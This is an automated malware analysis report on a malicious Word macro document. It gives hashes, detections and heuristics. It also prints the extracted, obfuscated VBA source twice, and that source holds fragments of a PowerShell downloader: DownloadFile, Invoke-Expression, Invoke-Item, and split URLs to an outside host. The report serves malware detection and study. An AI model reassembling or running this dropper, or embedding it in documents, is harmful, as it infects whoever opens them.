Office (OLE) malware analysis — malicious · 21bb0297d004bd66

MALICIOUS

Office (OLE)

220.0 KB Created: 2017-12-29 07:15:00 Authoring application: Microsoft Office Word First seen: 2018-01-08

MD5: 5c79aed62a6d427c8cf78c6ec7902889 SHA-1: 054020009d862109288e180fd0c4b6d7ccc1c7c3 SHA-256: 21bb0297d004bd6604870055b164da275fffdbeb50068c9480e78fe07cc2652f

242 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing a VBA macro. The macro utilizes the Shell() function, indicating an attempt to execute arbitrary commands. This is further supported by the ClamAV detection name 'Img.Dropper.PhishingLure-6443153-0', suggesting a phishing lure designed to drop further malicious content. The presence of an AutoOpen macro and Shell() call strongly suggests the intent to execute a second-stage payload upon opening.

Heuristics 7

ClamAV: Img.Dropper.PhishingLure-6443153-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Img.Dropper.PhishingLure-6443153-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 71858 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	71858 bytes
SHA-256: `97f1ae52f71946c5d71cdb6e7e8d37f872a059e816eec9792fad7f07f869a73a`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "PuPIjATdllmI" Function bRNCUwThwBumV() On Error Resume Next ZrIRjuircdC = (ksFQAJrqF - Rnd(43 * Tan(FkTXMwcaaTEfYM)) / jwAdUCF * Oct(cZvzsCPBtKO) * mKVXicpJUJETt / Oct(ULrMlzAIq - Chr(250) + 581 - ChrB(QwkYKSKVKUQVcc)) - 389 + sMwHSVcGihDJhY) vXXjvzI = (oucQUDXUXkqYhX - Rnd(43 * Tan(RBzzRWpPKWStq)) / VzNZUivirZ * Oct(aljpsiACffPqK) * cwfRuCJ / Oct(BClcwMovmKaK - Chr(250) + 581 - ChrB(kIZSoRqKoFICY)) - 389 + kPNzXdtkiEPjo) iczAAJnn = (haXwRqIS) + Mid("Mcd+'oc+2oc'+'q2oc+2ocLh2oc+2ocuas2oc+2oc);Inv2oc+2ocoke-Item(kqLhu2oc+2ocas);break;}ca'+'tc2oc+2och'+'{w2oc+2oc'+'rit2oc+2oce'+'-hos2oc+2oct kO81wjwf2KmvSNj98wGjA52V9OMki5CnXi", 4, 140) YaEtsWKLpz = (rdUXHmrRw - Rnd(43 * Tan(wiIYwwi)) / RtkEAYcop * Oct(qGJdztc) * BEVJAvzFTmTh / Oct(jVuQfjndvvSw - Chr(250) + 581 - ChrB(brtVlPwKziuH)) - 389 + pGvEpVIXGlOMR) ipEaci = (ZGqXzccciX - Rnd(43 * Tan(lwnSkuVf)) / RBUqczizUOSXla * Oct(INQhWwAlPOsX) * ihKtNfHXm / Oct(uAwiIUF - Chr(250) + 581 - ChrB(AXAKWioIAQQE)) - 389 + kbPOnDYKFSP) KblYcsjZ = (MwBElXm - Rnd(43 * Tan(zImrjhrGzoOUG)) / JTCHArVrviV * Oct(jGnQXAU) * OEfVIbOBEYAwzh / Oct(iCiXuVHNHVfwl - Chr(250) + 581 - ChrB(jROALPEnj)) - 389 + ZdTnWiWBBRFOtc) kwifBQmwO = (pJFICMOT) + Mid("JYt8juU02ocbc.T2oc+2oco2oc+2ocStri2o'+'cV52+V52+2ocng(), ZE", 9, 49) ocwCZvccOj = (NVhXRsRKfs - Rnd(43 * Tan(NYKjFFiqHhYKYi)) / VQjZuFloI * Oct(HliYwtwr) * CqcWTEabHno / Oct(IpBWAdFz - Chr(250) + 581 - ChrB(bjBXwUwSIocTzj)) - 389 + tuNUTddATw) VmhLij = (bDbPJoSKJbE - Rnd(43 * Tan(UDtIrbN)) / rAiPZcJtaRCP * Oct(nwcimSHHJNv) * VWWnhCHhco / Oct(ZLphfZjsZoZ - Chr(250) + 581 - ChrB(GRaFIGdhnjtD)) - 389 + nFtPuhB) jkoSscX = (JwzMrKJcdGQ - Rnd(43 * Tan(dRzjhYzYPPKY)) / ZQFTSusjpTiA * Oct(HnmEYrzF) * OcXsaVMPu / Oct(baRtDJLLXBowT - Chr(250) + 581 - ChrB(aQLlKrTYjJCc)) - 389 + ZUXWZYqZhpujvN) IKtHDDzjoYi = (vjCzPqtjaGazUk) + Mid("StafmXXMbPlAc'+'E(2V52+V52ochKM2oc,2ocLW'+'22oc).rEPlAcE(([Char]117+[Char]65+[Char]75),[sTRINg][CV52+V52har]39).rEPlAcE(2ockqL2oc,[sTRINg][Char]36) MrV52+V52uInVoke-eXpressiONV52)-cRepLACe ([hT", 10, 183) noAUvt = (VCWwkbiaVWjwpQ - Rnd(43 * Tan(GzwbwGnqSl)) / sTpdiHYikOE * Oct(XivHSNMH) * WknRvGCsh / Oct(DKJjPkrr - Chr(250) + 581 - ChrB(YHfHBoawDw)) - 389 + dFiKViCLjB) MiEjflBPkF = (fzFjudYrXjSz - Rnd(43 * Tan(ZzTjCWZknMN)) / FjQhaYoRrlzoz * Oct(sOvZtcTwMDaX) * mrwrksup / Oct(IJzHihinzijSdL - Chr(250) + 581 - ChrB(NTkWITMGCNCat)) - 389 + PwDuvGlclwlNY) CKLonp = (mjJrclcUJz - Rnd(43 * Tan(MjwjwNjhjIYCRd)) / AqMBXbv * Oct(SuAiGQiO) * WvpSCRQiApuNN / Oct(sNXllIIcSRbf - Chr(250) + 581 - ChrB(ziZQzuhfWnmz)) - 389 + vSWlAuENIR) XNjUBCic = (pCBBzOvjXa) + Mid("qhiilDXMjR6Scwiqo3m0IQwbr9j54http2oc+2oc://www.mba-2oc+2ocin2oc+2o'+'ctensive.2oc+2ocr2ocV52+V52+2ocu/IGV52+V52Dp72oc+2ocW/,2oc+2ocht2oc+2oct2oc+2ocp:V52+V5'+'22o'+'c+2oc//ww2oNPz8cqOnku", 30, 147) KzvUPmB = (vosIjIi - Rnd(43 * Tan(IXhcvCuub)) / puiijXhE * Oct(kilkuvH) * OVtukPzo / Oct(NTKiirWiXiX - Chr(250) + 581 - ChrB(IUbbFtjWm)) - 389 + horfYiMFfktA) ImWqFqNHpV = (iKIjfzQwVIG - Rnd(43 * Tan(ViDSNdinAOW)) / nmCfVDWIiDL * Oct(OLJSaCFb) * aWpcYvU / Oct(bZTohstwlaS - Chr(250) + 581 - ChrB(zzSSqDCTLMzI)) - 389 + XNQNCwHBdHdsYh) BjGhYw = (jzGASSfVO - Rnd(43 * Tan(sblWrCSnR)) / wnTHKMhkr * Oct(HjOQFtZYQuaJV) * IidXdzYbpFS / Oct(izqFluiWKMMVRz - Chr(250) + 581 - ChrB(uXXrpRrwbjK)) - 389 + sTfqJwIO) DdcAqQ = (OtUCqPGX) + Mid("vWK2adfb1Mocownlo2oc+2oV52+V52ca2oc+2o'+'cdFi2oc+'+a0PjIE3ChzSvC", 11, 41) jtijN = (QVobnqGdD - Rnd(43 * Tan(lVtBSObLtK)) / djiiLjTqpaR * Oct(jDqYWVFQjM) * RbNALsBjfXonm / Oct(zbGmnNv - Chr(250) + 581 - ChrB(zKwcqFqot)) - 389 + QrRDziIwntmzuP) QNwSldBWhi = (jiwOquiz - Rnd(43 * Tan(ithOMmBzMv)) / TbinXGptY * Oct(BGmpAjR) * CJXBhiWnNwG / Oct(JbOptFE - Chr(250) + 581 - ChrB(qjElZVcn)) - 389 + YLFkUJmuRtwRks) iYJwKl = (wbDCiBwqrdsWuo - Rnd(43 * Tan(d ... (truncated)

SHA-256: 97f1ae52f71946c5d71cdb6e7e8d37f872a059e816eec9792fad7f07f869a73a

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "PuPIjATdllmI"
Function bRNCUwThwBumV()
On Error Resume Next
ZrIRjuircdC = (ksFQAJrqF - Rnd(43 * Tan(FkTXMwcaaTEfYM)) / jwAdUCF * Oct(cZvzsCPBtKO) * mKVXicpJUJETt / Oct(ULrMlzAIq - Chr(250) + 581 - ChrB(QwkYKSKVKUQVcc)) - 389 + sMwHSVcGihDJhY)
vXXjvzI = (oucQUDXUXkqYhX - Rnd(43 * Tan(RBzzRWpPKWStq)) / VzNZUivirZ * Oct(aljpsiACffPqK) * cwfRuCJ / Oct(BClcwMovmKaK - Chr(250) + 581 - ChrB(kIZSoRqKoFICY)) - 389 + kPNzXdtkiEPjo)
iczAAJnn = (haXwRqIS) + Mid("Mcd+'oc+2oc'+'q2oc+2ocLh2oc+2ocuas2oc+2oc);Inv2oc+2ocoke-Item(kqLhu2oc+2ocas);break;}ca'+'tc2oc+2och'+'{w2oc+2oc'+'rit2oc+2oce'+'-hos2oc+2oct kO81wjwf2KmvSNj98wGjA52V9OMki5CnXi", 4, 140)
YaEtsWKLpz = (rdUXHmrRw - Rnd(43 * Tan(wiIYwwi)) / RtkEAYcop * Oct(qGJdztc) * BEVJAvzFTmTh / Oct(jVuQfjndvvSw - Chr(250) + 581 - ChrB(brtVlPwKziuH)) - 389 + pGvEpVIXGlOMR)
ipEaci = (ZGqXzccciX - Rnd(43 * Tan(lwnSkuVf)) / RBUqczizUOSXla * Oct(INQhWwAlPOsX) * ihKtNfHXm / Oct(uAwiIUF - Chr(250) + 581 - ChrB(AXAKWioIAQQE)) - 389 + kbPOnDYKFSP)
KblYcsjZ = (MwBElXm - Rnd(43 * Tan(zImrjhrGzoOUG)) / JTCHArVrviV * Oct(jGnQXAU) * OEfVIbOBEYAwzh / Oct(iCiXuVHNHVfwl - Chr(250) + 581 - ChrB(jROALPEnj)) - 389 + ZdTnWiWBBRFOtc)
kwifBQmwO = (pJFICMOT) + Mid("JYt8juU02ocbc.T2oc+2oco2oc+2ocStri2o'+'cV52+V52+2ocng(), ZE", 9, 49)
ocwCZvccOj = (NVhXRsRKfs - Rnd(43 * Tan(NYKjFFiqHhYKYi)) / VQjZuFloI * Oct(HliYwtwr) * CqcWTEabHno / Oct(IpBWAdFz - Chr(250) + 581 - ChrB(bjBXwUwSIocTzj)) - 389 + tuNUTddATw)
VmhLij = (bDbPJoSKJbE - Rnd(43 * Tan(UDtIrbN)) / rAiPZcJtaRCP * Oct(nwcimSHHJNv) * VWWnhCHhco / Oct(ZLphfZjsZoZ - Chr(250) + 581 - ChrB(GRaFIGdhnjtD)) - 389 + nFtPuhB)
jkoSscX = (JwzMrKJcdGQ - Rnd(43 * Tan(dRzjhYzYPPKY)) / ZQFTSusjpTiA * Oct(HnmEYrzF) * OcXsaVMPu / Oct(baRtDJLLXBowT - Chr(250) + 581 - ChrB(aQLlKrTYjJCc)) - 389 + ZUXWZYqZhpujvN)
IKtHDDzjoYi = (vjCzPqtjaGazUk) + Mid("StafmXXMbPlAc'+'E(2V52+V52ochKM2oc,2ocLW'+'22oc).rEPlAcE(([Char]117+[Char]65+[Char]75),[sTRINg][CV52+V52har]39).rEPlAcE(2ockqL2oc,[sTRINg][Char]36) MrV52+V52uInVoke-eXpressiONV52)-cRepLACe  ([hT", 10, 183)
noAUvt = (VCWwkbiaVWjwpQ - Rnd(43 * Tan(GzwbwGnqSl)) / sTpdiHYikOE * Oct(XivHSNMH) * WknRvGCsh / Oct(DKJjPkrr - Chr(250) + 581 - ChrB(YHfHBoawDw)) - 389 + dFiKViCLjB)
MiEjflBPkF = (fzFjudYrXjSz - Rnd(43 * Tan(ZzTjCWZknMN)) / FjQhaYoRrlzoz * Oct(sOvZtcTwMDaX) * mrwrksup / Oct(IJzHihinzijSdL - Chr(250) + 581 - ChrB(NTkWITMGCNCat)) - 389 + PwDuvGlclwlNY)
CKLonp = (mjJrclcUJz - Rnd(43 * Tan(MjwjwNjhjIYCRd)) / AqMBXbv * Oct(SuAiGQiO) * WvpSCRQiApuNN / Oct(sNXllIIcSRbf - Chr(250) + 581 - ChrB(ziZQzuhfWnmz)) - 389 + vSWlAuENIR)
XNjUBCic = (pCBBzOvjXa) + Mid("qhiilDXMjR6Scwiqo3m0IQwbr9j54http2oc+2oc://www.mba-2oc+2ocin2oc+2o'+'ctensive.2oc+2ocr2ocV52+V52+2ocu/IGV52+V52Dp72oc+2ocW/,2oc+2ocht2oc+2oct2oc+2ocp:V52+V5'+'22o'+'c+2oc//ww2oNPz8cqOnku", 30, 147)
KzvUPmB = (vosIjIi - Rnd(43 * Tan(IXhcvCuub)) / puiijXhE * Oct(kilkuvH) * OVtukPzo / Oct(NTKiirWiXiX - Chr(250) + 581 - ChrB(IUbbFtjWm)) - 389 + horfYiMFfktA)
ImWqFqNHpV = (iKIjfzQwVIG - Rnd(43 * Tan(ViDSNdinAOW)) / nmCfVDWIiDL * Oct(OLJSaCFb) * aWpcYvU / Oct(bZTohstwlaS - Chr(250) + 581 - ChrB(zzSSqDCTLMzI)) - 389 + XNQNCwHBdHdsYh)
BjGhYw = (jzGASSfVO - Rnd(43 * Tan(sblWrCSnR)) / wnTHKMhkr * Oct(HjOQFtZYQuaJV) * IidXdzYbpFS / Oct(izqFluiWKMMVRz - Chr(250) + 581 - ChrB(uXXrpRrwbjK)) - 389 + sTfqJwIO)
DdcAqQ = (OtUCqPGX) + Mid("vWK2adfb1Mocownlo2oc+2oV52+V52ca2oc+2o'+'cdFi2oc+'+a0PjIE3ChzSvC", 11, 41)
jtijN = (QVobnqGdD - Rnd(43 * Tan(lVtBSObLtK)) / djiiLjTqpaR * Oct(jDqYWVFQjM) * RbNALsBjfXonm / Oct(zbGmnNv - Chr(250) + 581 - ChrB(zKwcqFqot)) - 389 + QrRDziIwntmzuP)
QNwSldBWhi = (jiwOquiz - Rnd(43 * Tan(ithOMmBzMv)) / TbinXGptY * Oct(BGmpAjR) * CJXBhiWnNwG / Oct(JbOptFE - Chr(250) + 581 - ChrB(qjElZVcn)) - 389 + YLFkUJmuRtwRks)
iYJwKl = (wbDCiBwqrdsWuo - Rnd(43 * Tan(d
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.